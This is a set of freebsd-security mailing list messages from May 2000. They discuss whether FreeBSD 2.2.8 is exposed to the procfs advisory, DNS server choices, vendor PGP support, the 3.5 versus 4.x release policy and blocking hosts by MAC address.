From owner-freebsd-security Sun May 21 11:08:53 2000
Date: Sun, 21 May 2000 14:08:47 -0400
From: "Crist J. Clark"
To: freebsd-security@freebsd.org
Subject: The procfs Hole in 2.2.8-STABLE?
Message-ID: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>
Reply-To: cjclark@home.com

I just want to verify something before I cause myself some pain. From
the wording of FreeBSD-SA-00:01,

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:02.procfs.asc

Am I to take it that 2.2.8-STABLE would be vulnerable? The following
seems to imply it,

"Unfortunately, throughout these three years it was still possible to
abuse /proc/pid/mem in a similar, though more complicated fashion,
which could lead to local root compromise."

Since the 2.2.x branch was the RELEASE and STABLE branch for a good
part of that three years.

It just occurred to me recently that the UW IMAP vulnerability that
allows users to get a shell combined with a procfs hole would be a Bad
Thing on an old 2.2.8-STABLE mailserver I have. I'm not going to go
through the pain of upgrading the OS on that machine except for security
reasons (it's been fine for two years, why fix what ain't broke).

Do I need to upgrade it? Maybe I'll just umount /proc.

-- 
Crist J. Clark                           cjclark@home.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 21 11:19:59 2000
Date: Sun, 21 May 2000 11:19:22 -0700
From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
To: cjclark@home.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
In-reply-to: Your message of "Sun, 21 May 2000 14:08:47 EDT." <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>
Message-Id: <200005211819.e4LIJSX67798@cwsys.cwsent.com>

In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>, "Crist J. Clark" writes:
> I just want to verify something before I cause myself some pain. From
> the wording of FreeBSD-SA-00:01,
>
> ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:02.procfs.asc
>
> Am I to take it that 2.2.8-STABLE would be vulnerable? The following
> seems to imply it,
>
> "Unfortunately, throughout these three years it was still possible to
> abuse /proc/pid/mem in a similar, though more complicated fashion,
> which could lead to local root compromise."
>
> Since the 2.2.x branch was the RELEASE and STABLE branch for a good
> part of that three years.
>
> It just occurred to me recently that the UW IMAP vulnerability that
> allows users to get a shell combined with a procfs hole would be a Bad
> Thing on an old 2.2.8-STABLE mailserver I have. I'm not going to go
> through the pain of upgrading the OS on that machine except for security
> reasons (it's been fine for two years, why fix what ain't broke).
>
> Do I need to upgrade it? Maybe I'll just umount /proc.

Just umount /proc, though ps won't display the command line and gdb
won't work.

Regards,                         Phone:  (250)387-8437
Cy Schubert                        Fax:  (250)387-5766
Team Leader, Sun/DEC Team     Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Sun May 21 19:21:27 2000
Date: Sun, 21 May 2000 22:21:24 -0400
From: Chris Johnson
To: User Datagram Protocol
Cc: freebsd-security@freebsd.org
Subject: Re: pid file for named
Message-ID: <20000521222124.A55554@palomine.net>
References: <20000516131606.C16398@naiad.eclipse.net.uk> <20000516132531.M2139@closed-networks.com>
In-Reply-To: <20000516132531.M2139@closed-networks.com>; from udp@closed-networks.com on Tue, May 16, 2000 at 01:25:31PM +0100

On Tue, May 16, 2000 at 01:25:31PM +0100, User Datagram Protocol wrote:
> On Tue, May 16, 2000 at 01:16:06PM +0100, Stuart Henderson wrote:
> > On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote:
> > > One often wishes to run daemons such as named under other users, e.g.,
> > > bind:bind. In order to allow bind to write out zones and associated fun
> > > stuff correctly, one then does a
> >
> > For dns, surely djb's servers are a better choice where security is a
> > priority?
> >
>
> I have no firm figures, just subjective time perception, but a box running
> djb's dnscache seemed a heck of a lot slower than another box running regular
> BIND at doing reverse lookups...

That hasn't been my experience, and I'm running djb's (that's Daniel J.
Bernstein, if anyone's wondering) dnscache/tinydns everywhere. If you have
performance problems, try posting a message to dns@list.cr.yp.to and see if
anyone has anything to offer.

I've been BIND-free since dnscache's first alpha release, and I haven't had a
single problem.

http://cr.yp.to/dnscache.html, for anyone who's interested.

Chris

From owner-freebsd-security Sun May 21 19:25:04 2000
Date: Sun, 21 May 2000 19:25:00 -0700
From: "Roger Sohn"
To:
Subject: RE: security-digest V4 #636
Message-ID: <000001bfc394$eeabdd00$ce1e41d8@securabyte>

unsubscribe

From owner-freebsd-security Sun May 21 19:54:10 2000
Date: Sun, 21 May 2000 22:51:11 -0400
From: Bob Johnson
To: rwatson@FreeBSD.org
Cc: security@FreeBSD.org
Subject: NAI, PGP, and FreeBSD (was Re: HEADS UP: New host key for freefall!)
Message-Id: <3.0.6.32.20000521225111.0083bb10@rio.atlantic.net>

>Date: Thu, 18 May 2000 11:31:53 -0400 (EDT)
>From: Robert Watson
>Subject: Re: HEADS UP: New host key for freefall!
>
>On Thu, 18 May 2000, Martin Machacek wrote:
>
>> On 17-May-00 Garrett Wollman wrote:
>> > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so
>> > they really don't care whether the commercial product exists or not.
>> > I use GnuPG, personally, since then I don't have to worry about any
>> > licensing issues at all.
>>
>> I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any
>> problems. Maybe that's another reason ...
>
>For all interested: I contacted the appropriate NAI/PGP developers to find
>out about a native FreeBSD build a few weeks ago. The response was that
>they have seen zero (0) demand for a FreeBSD build, and therefore don't

B.S. - I asked their sales droids about it within the past two months.

>believe there is a substantial market to support a porting effort. I
>would tend to believe it's one of these, ``If you don't build it, they
>won't come'' kind of things, as well as that the communication channels
>between sales and development on that side are quite weak--prior to
>joining NAI, I spent literally hours on the phone trying to register my
>copy of PGP and failed to give them money :-(.

I think this is a significant issue. I decided a year ago that it was
useless to contact NAI about anything, so I don't bother. I spent
five months trying to renew + upgrade a 200 user license and never
got anywhere. I'd rather give my money to someone who cares.

I've since changed jobs, and at my new one I attended a presentation
by NAI-affiliated sales droids who were trying to convince us to use
them for a 20,000-node site license. I asked them if they supported
FreeBSD. They laughed and said "no". Didn't make me inclined to
support them, particularly since some of the other companies looking
for our business seemed much more interested in (and capable of)
supporting Unix in general.

>
>However, I think an organized campaign here would make a difference--if
>your company has an NAI/PGP sales rep, let them know that you're
>interested in a native FreeBSD build. In particular, let them know if you
>are willing to spend money--there's no point in building a visible demand
>that falls through on the sales side, making it less likely to happen next
>time :-).

I already did that. As I said above, they laughed. And apparently
didn't pass the word up the line.

The sales droids (for any AV vendor) seem to have a hard time
understanding why they should support an O/S that is installed on so
few computers. I've tried to explain to them that, for example, when
I set up a mail server to support 200 Windows systems, it runs
FreeBSD. By supporting a FreeBSD mail server, they aren't just
supporting one computer, they are supporting hundreds of computers.
If they happen to be a company that supports some variation on Unix,
they usually ask why I don't use that (usually Linux or Solaris). I
tell them I use FreeBSD because I'd rather use a server whose
developers have been thinking about security for years rather than
months.

Their strategy is to support the OS that they perceive to have the
most users. The users, of course, tend to select the OS that they
perceive as supported by the most vendors. The result is a sort of
drunkard's walk in which the random noise generated by "journalists"
who write articles based on a week of "evaluations" decides who is
going to support what. If the vendors would instead support the OS
best suited to the job, the users would tend to follow them.

In any case, my experience with NAI suggests that we would be
better off putting our energy into convincing just about any
other AV vendor to support FreeBSD. What good does it do us for
NAI to support FreeBSD if we can't actually buy their products?

>
> Robert N M Watson
>
>robert@fledge.watson.org              http://www.watson.org/~robert/
>PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
>TIS Labs at Network Associates, Safeport Network Services
>

- Bob

+--------------------------------------------------------
| Bob Johnson                            | bobj@atlantic.net
+--------------------------------------------------------

From owner-freebsd-security Sun May 21 20:04:36 2000
Date: Sun, 21 May 2000 21:04:14 -0600
From: Brett Glass
To: Bob Johnson, rwatson@FreeBSD.ORG
Cc: security@FreeBSD.ORG
Subject: Re: NAI, PGP, and FreeBSD (was Re: HEADS UP: New host key for freefall!)
In-Reply-To: <3.0.6.32.20000521225111.0083bb10@rio.atlantic.net>
Message-Id: <4.3.1.2.20000521205727.048b9100@localhost>

At 08:51 PM 5/21/2000, Bob Johnson wrote:

> >For all interested: I contacted the appropriate NAI/PGP developers to find
> >out about a native FreeBSD build a few weeks ago. The response was that
> >they have seen zero (0) demand for a FreeBSD build, and therefore don't
>
> >B.S. - I asked their sales droids about it within the past two months.

This is typical. Sales droids ignore, or conveniently forget, requests
for ports to platforms which are not already supported. They then claim
that there's "no demand." Their motivation for this behavior is that
their performance is measured by how much of EXISTING products they
sell, not the accuracy of customer feedback they bring back from
customers. They see additional platforms as making their lives more
difficult. This is why so many sales droids wish that everything but
Windows would go away.

>I think this is a significant issue. I decided a year ago that it was
>useless to contact NAI about anything, so I don't bother. I spent
>five months trying to renew + upgrade a 200 user license and never
>got anywhere. I'd rather give my money to someone who cares.

NAI is -- alas -- a large, shortsighted, profit-oriented "blob" of a
company. Other companies vanish into its gaping maw and are absorbed,
losing all vestiges of their former identity. Then, the original
developers of the products leave, and the products cease to be improved
in significant ways. This is what happened with Helix Software, which
used to make some very fine products. Eaten by NAI. (Belch!)

>In any case, my experience with NAI suggests that we would be
>better off putting our energy into convincing just about any
>other AV vendor to support FreeBSD.

I agree. Trend Micro would be a good candidate, since they furnish
software to US West and US West uses FreeBSD internally (as per Barry
Caplin).

--Brett

From owner-freebsd-security Sun May 21 21:38:17 2000
Date: Sun, 21 May 2000 22:37:11 -0600
From: Warner Losh
To: cjclark@home.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
In-reply-to: Your message of "Sun, 21 May 2000 14:08:47 EDT." <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>
References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>
Message-Id: <200005220437.WAA92094@harmony.village.org>

In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes:
: Am I to take it that 2.2.8-STABLE would be vulnerable? The following

Yes.  There are many vulnerabilities that were fixed in 3.x that
haven't been back ported to 2.x.

Warner

From owner-freebsd-security Sun May 21 21:59:29 2000
Date: Sun, 21 May 2000 22:58:57 -0600
From: Brett Glass
To: Warner Losh, cjclark@home.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
In-Reply-To: <200005220437.WAA92094@harmony.village.org>
References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>
Message-Id: <4.3.1.2.20000521225733.048a0c40@localhost>

Hopefully, some of the things that are being fixed in 4.0 will
be backported to 3.5. We want 3.5 to be the "golden" release that
we use for production until 4.2 is ready and stable.

--Brett

At 10:37 PM 5/21/2000, Warner Losh wrote:
>In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes:
>: Am I to take it that 2.2.8-STABLE would be vulnerable? The following
>
>Yes.  There are many vulnerabilities that were fixed in 3.x that
>haven't been back ported to 2.x.
>
>Warner

From owner-freebsd-security Sun May 21 22:19:02 2000
Date: Sun, 21 May 2000 23:18:37 -0600
From: Warner Losh
To: Brett Glass
Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
In-reply-to: Your message of "Sun, 21 May 2000 22:58:57 MDT." <4.3.1.2.20000521225733.048a0c40@localhost>
References: <4.3.1.2.20000521225733.048a0c40@localhost> <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com>
Message-Id: <200005220518.XAA67456@billy-club.village.org>

In message <4.3.1.2.20000521225733.048a0c40@localhost> Brett Glass writes:
: Hopefully, some of the things that are being fixed in 4.0 will
: be backported to 3.5. We want 3.5 to be the "golden" release that
: we use for production until 4.2 is ready and stable.

4.1 should be golden enough for production in even the most demanding
environments.  That said, as far as I know people have been good and
backported all relevant security fixes made to 4.0 back to the 3.x
branch.

Warner

From owner-freebsd-security Sun May 21 23:25:47 2000
Date: Sun, 21 May 2000 23:25:25 -0700
From: Doug Barton
Organization: Triborough Bridge & Tunnel Authority
To: Brett Glass
Cc: Warner Losh, cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost>
Message-ID: <3928D2D5.DCA07289@gorean.org>

Brett Glass wrote:
>
> Hopefully, some of the things that are being fixed in 4.0 will
> be backported to 3.5.

Tradition (and at this point it's one that I agree with) says that
only stability and security improvements get committed to the branches
we're leaving behind after the most recent version branches. Adding new
features to 3.x at this point would encourage people to stay with that
branch.

> We want 3.5 to be the "golden" release that
> we use for production until 4.2 is ready and stable.

Yes Brett, we're all well aware of what you want, you've stated it many
times. However most of the project would prefer to help dispel the idea
that the 4.x release isn't ready for production. That doesn't mean that
you can't use whatever policy you want where you work, it just means that
you don't need to tell us about it anymore.
From owner-freebsd-security Sun May 21 23:57:49 2000
Date: Sun, 21 May 2000 23:57:41 -0700 (PDT)
From: Matthew Dillon
To: Doug Barton
Cc: Brett Glass, Warner Losh, cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org>
Message-Id: <200005220657.XAA56693@apollo.backplane.com>

I think 3.4 was our 'golden release' for the 3.x series.  3.5 is only
going to have small cleanups, sort of like 2.2.8 had only small cleanups
over 2.2.7.  People have been MFCing bug fixes reasonably well, but
that's as far as it's going to go.  Many of the new features in 4.x would
simply be too difficult to backport into 3.x, and a lot of the really new
stuff is being built on the older new stuff in 4.0-release.  There is no
chance of any of that being backported.

My personal opinion is that the 4.0 release *already* exceeded 3.4 in
regards to stability, and 4.x in general is far, far superior in
virtually all regards.  SMP, VM, NFS (my babies) are direct examples.
4.0 is the first release where you can actually *TRUST* all the memory
manipulation and mapping syscalls (madvise, msync, mmap) to work
properly!

I expect 4.1 will be the banner distribution for us if 4.0 hasn't
already stolen the thunder!  3.5 will be an afterthought at best.

-Matt

From owner-freebsd-security Mon May 22 00:13:04 2000
Date: Mon, 22 May 2000 03:11:48 -0400
From: Will Andrews
To: Matthew Dillon
Cc: Doug Barton, Brett Glass, Warner Losh, cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
Message-ID: <20000522031147.Q96325@argon.blackdawn.com>
References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> <200005220657.XAA56693@apollo.backplane.com>
In-Reply-To: <200005220657.XAA56693@apollo.backplane.com>; from dillon@apollo.backplane.com on Sun, May 21, 2000 at 11:57:41PM -0700
X-Operating-System: FreeBSD 5.0-CURRENT i386

On Sun, May 21, 2000 at 11:57:41PM -0700, Matthew Dillon wrote:
> I expect 4.1 will be the banner distribution for us if 4.0 hasn't
> already stolen the thunder!  3.5 will be an afterthought at best.

I agree completely with this, and hope that Jordan doesn't have a 3.5
planned. We need to move forward and focus more on RELENG_4.

-- 
Will Andrews
GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w---
?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+
G++>+++ e->++++ h! r-->+++ y?

From owner-freebsd-security Mon May 22 00:33:42 2000
Date: Mon, 22 May 2000 00:32:49 -0700
From: Doug Barton
Organization: Triborough Bridge & Tunnel Authority
To: Will Andrews
Cc: Matthew Dillon, Warner Losh, cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: The procfs Hole in 2.2.8-STABLE?
References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> <200005220657.XAA56693@apollo.backplane.com> <20000522031147.Q96325@argon.blackdawn.com>
Message-ID: <3928E2A1.A6B3D4A3@gorean.org>

Will Andrews wrote:
>
> On Sun, May 21, 2000 at 11:57:41PM -0700, Matthew Dillon wrote:
> > I expect 4.1 will be the banner distribution for us if 4.0 hasn't
> > already stolen the thunder!  3.5 will be an afterthought at best.
>
> I agree completely with this, and hope that Jordan doesn't have a 3.5
> planned. We need to move forward and focus more on RELENG_4.

3.5 has been promised, and Jordan already said that it will be
delivered, albeit not on CD. I think it'll be worthwhile to cap it off,
and focus on 4.x as you're describing.

Doug
-- 
"Live free or die" - State motto of my ancestral homeland, New Hampshire

Do YOU Yahoo!?
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 0:55:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 950C437B6C4 for ; Mon, 22 May 2000 00:55:54 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id AAA15463; Mon, 22 May 2000 00:57:17 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Will Andrews Cc: Matthew Dillon , Doug Barton , Brett Glass , Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? In-reply-to: Your message of "Mon, 22 May 2000 03:11:48 EDT." <20000522031147.Q96325@argon.blackdawn.com> Date: Mon, 22 May 2000 00:57:17 -0700 Message-ID: <15460.958982237@localhost> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I agree completely with this, and hope that Jordan doesn't have a 3.5 > planned. We need to move forward and focus more on RELENG_4. Woogod, let's not go here again! We went over the whole "what was planned WILL happen" thread ad-nauseum about a month ago and suffice it to say that 3.5 WILL happen, it's been requested by at least twice as many people as have asked that it not happen, end of story. In fact, there were previously plans to do it as a "network only" release and not do a CD release, but BSDi has been forced to change even that decision in the face of customer pressure. Various customers are saying that they want 3.5 on CD and they're waving their checkbooks around. In the world of business, that generally results in a change of heart and this situation is no different. If BSDi didn't do a CD of 3.5, somebody else also would have. I have hard evidence of this. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 4:33:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id BB20537BAC7 for ; Mon, 22 May 2000 04:33:25 -0700 (PDT) (envelope-from nbm@sunesi.net) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 12tqSH-000AUp-00; Mon, 22 May 2000 13:33:05 +0200 Date: Mon, 22 May 2000 13:33:05 +0200 
From: Neil Blakey-Milner To: Chris Johnson Cc: User Datagram Protocol , freebsd-security@freebsd.org Subject: Re: pid file for named Message-ID: <20000522133305.A40314@mithrandr.moria.org> References: <20000516131606.C16398@naiad.eclipse.net.uk> <20000516132531.M2139@closed-networks.com> <20000521222124.A55554@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000521222124.A55554@palomine.net>; from cjohnson@palomine.net on Sun, May 21, 2000 at 10:21:24PM -0400 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Sun 2000-05-21 (22:21), Chris Johnson wrote:
> That hasn't been my experience, and I'm running djb's (that's Daniel J.
> Bernstein, if anyone's wondering) dnscache/tinydns everywhere. If you have
> performance problems, try posting a message to dns@list.cr.yp.to and see if
> anyone has anything to offer.
>
> I've been BIND-free since dnscache's first alpha release, and I haven't had a
> single problem.
>
> http://cr.yp.to/dnscache.html, for anyone who's interested.

Have you tried the port? I haven't been able to find anyone else to test it properly. I'd appreciate some feedback.
Neil (who is unfortunately maintainer for most of the djb ports)

-- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org

From owner-freebsd-security Mon May 22 9:53:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id E39DF37BADF for ; Mon, 22 May 2000 09:53:16 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA11035; Mon, 22 May 2000 10:52:56 -0600 (MDT) Message-Id: <4.3.1.2.20000522103818.04569960@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 22 May 2000 10:52:51 -0600 To: Matthew Dillon , Doug Barton
From: Brett Glass Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG In-Reply-To: <200005220657.XAA56693@apollo.backplane.com> References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 12:57 AM 5/22/2000, Matthew Dillon wrote:
> I think 3.4 was our 'golden release' for the 3.x series.

I've seen some really important fixes (not enhancements, but fixes) added after 3.4-RELEASE. Enough that I'd want to see a 3.5.

> 3.5 is only
> going to have small cleanups, sort of like 2.2.8 had only small cleanups
> over 2.2.7. People have been MFCing bug fixes reasonably well, but
> that's as far as it's going to go. Many of the new features in 4.x
> would simply be too difficult to backport into 3.x, and a lot of the
> really new stuff is being built on the older new stuff in 4.0-release.
> There is no chance of any of that being backported.

I understand that the backporting will be limited to important features.

> My personal opinion is that the 4.0 release *already* exceeded 3.4 in
> regards to stability, and 4.x in general is far, far superior in
> virtually all regards. SMP, VM, NFS (my babies) are direct examples.

I hope you don't think that I'm putting down your work in these areas; I'm not. In fact, from what I've seen, I think it is quite good. It's simply a matter of policy. We never use a .0 version of ANYTHING, from ANYONE, in a production environment. That's true whether it's FreeBSD or (shudder) Microsoft. We've noted that FreeBSD releases usually become as stable as the last release on the previous branch at about the .2 release. But not always. There were problems in 3.2 that caused us to delay full deployment until 3.3.
I might add that we do put later releases on workstations -- just not on key servers.

> 4.0 is the first release where you can actually *TRUST* all the memory
> manipulation and mapping syscalls (madvise, msync, mmap) to work
> properly!

That's good. There's been some VM strangeness in earlier versions that has hopefully been removed now.

> I expect 4.1 will be the banner distribution for us if 4.0 hasn't
> already stolen the thunder! 3.5 will be an afterthought at best.

It will be nice if a .1 release is truly that stable! However, I think you'll agree that it would be the first time that this was so. So, we will wait and see.... We can probably make that judgment about 6 weeks after 4.1 comes out.

There really is a great benefit in running software that's a bit behind the curve but whose quirks are known. The DoJ is demanding that Microsoft allow customers and OEMs to buy earlier versions of Windows rather than being forced to accept a new version.... The reason is that this is what many of them not only want but need. Forcing an upgrade is ungood.

--Brett

From owner-freebsd-security Mon May 22 10:39: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from arf.bussert.COM (arf.bussert.com [209.183.67.130]) by hub.freebsd.org (Postfix) with ESMTP id B175D37B5AC for ; Mon, 22 May 2000 10:38:57 -0700 (PDT) (envelope-from matheny@bussert.com) Received: from localhost (matheny@localhost) by arf.bussert.COM (8.9.3/8.9.3) with ESMTP id NAA08480 for ; Mon, 22 May 2000 13:08:30 -0500 (EST) (envelope-from matheny@bussert.com) Date: Mon, 22 May 2000 13:08:30 -0500 (EST)
From: Blake Matheny To: freebsd-security@freebsd.org Subject: Firewall Rules Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Is there a way to deny by mac address rather than ip address? I need to deny a group of computers (with static ip's) access to the internet, but if someone changes their ip (with DHCP) it doesn't do any good. These are windows boxes with a freebsd firewall, no policies on the computers and if possible I would like to implement this only on the firewall level. Anyone got any advice? Thanks.

-Blake

Blake Matheny
Bussert Consulting
Network Engineer
(765)423-2100
matheny@bussert.com

From owner-freebsd-security Mon May 22 11: 2:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 6BAB537BE1C for ; Mon, 22 May 2000 11:02:36 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id LAA61355; Mon, 22 May 2000 11:02:28 -0700 (PDT) (envelope-from dillon) Date: Mon, 22 May 2000 11:02:28 -0700 (PDT)
From: Matthew Dillon Message-Id: <200005221802.LAA61355@apollo.backplane.com> To: Blake Matheny Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

:Is there a way to deny by mac address rather than ip address? I need to
:deny a group of computers (with static ip's) access to the internet, but
:if someone changes their ip (with DHCP) it doesn't do any good. These are
:windows boxes with a freebsd firewall, no policies on the computers and if
:possible I would like to implement this only on the firewall level. Anyone
:got any advice? Thanks.
:-Blake
:
:Blake Matheny
:Bussert Consulting
:Network Engineer
:(765)423-2100
:matheny@bussert.com

You can set dhcp up to assign a specific IP address for a specific MAC address, would that be good enough or are you worried about the windows users screwing around with their network config?

-Matt
Matthew Dillon

From owner-freebsd-security Mon May 22 11: 3: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 6193C37BE96 for ; Mon, 22 May 2000 11:02:55 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id OAA35921; Mon, 22 May 2000 14:02:32 -0400 (EDT) (envelope-from cjc) Date: Mon, 22 May 2000 14:02:32 -0400
From: "Crist J. Clark" To: Warner Losh Cc: freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? Message-ID: <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <200005220437.WAA92094@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200005220437.WAA92094@harmony.village.org>; from imp@village.org on Sun, May 21, 2000 at 10:37:11PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Sun, May 21, 2000 at 10:37:11PM -0600, Warner Losh wrote:
> In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes:
> : Am I to take it that 2.2.8-STABLE would be vulnerable? The following
>
> Yes. There are many vulnerabilities that were fixed in 3.x that
> haven't been back ported to 2.x.

Most of the security advisories since things stopped being back-ported to 2.2.8 have been for ports. If I have the port, I remake a fixed version, use an alternative, or live without. As for things in the base system, the make vulnerability (FreeBSD-SA-00:01) doesn't really scare me on a mailserver. That seems to be the only base system one of any consequence in the advisories that has come up since they stopped getting back-ported to 2.2.8.

Should I be concerned about these "many vulnerabilities?" Where are they documented?

-- Crist J.
Clark cjclark@home.com

From owner-freebsd-security Mon May 22 11: 6:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 2031F37BBC9 for ; Mon, 22 May 2000 11:06:17 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3+openldap/8.9.3) id LAA05887; Mon, 22 May 2000 11:08:14 -0700 (PDT) Date: Mon, 22 May 2000 11:08:14 -0700
From: Andre Gironda To: Blake Matheny Cc: freebsd-security@freebsd.org Subject: Re: Firewall Rules Message-ID: <20000522110814.A5867@toaster.sun4c.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Blake Matheny on Mon, May 22, 2000 at 01:08:30PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Blake,

If possible, you should try to segment off those users, because I don't think there is a way with IPF or IPFW (or any firewall that I can think of) to block MAC addresses specifically.

There is the VLAN management policy server from Cisco systems that is available on their Catalyst series switches. The idea behind it is that you can put specific MAC addresses into particular VLANs. I would not trust it so well, but if you want further information look up VMPS.

Also, from LISA '99 there was a paper on doing MAC authentication but it was with locked-down ports (but I assume this does not limit DHCP depending on what you are doing):

Dealing with Public Ethernet Jacks - Switches, Gateways, and Authentication
http://www.ualberta.ca/~beck/authgw.html

There are actually a lot of ways to do this depending on what your network looks like and what your requirements are.

dre

On Mon, May 22, 2000 at 01:08:30PM -0500, Blake Matheny wrote:
> Is there a way to deny by mac address rather than ip address? I need to
> deny a group of computers (with static ip's) access to the internet, but
> if someone changes their ip (with DHCP) it doesn't do any good. These are
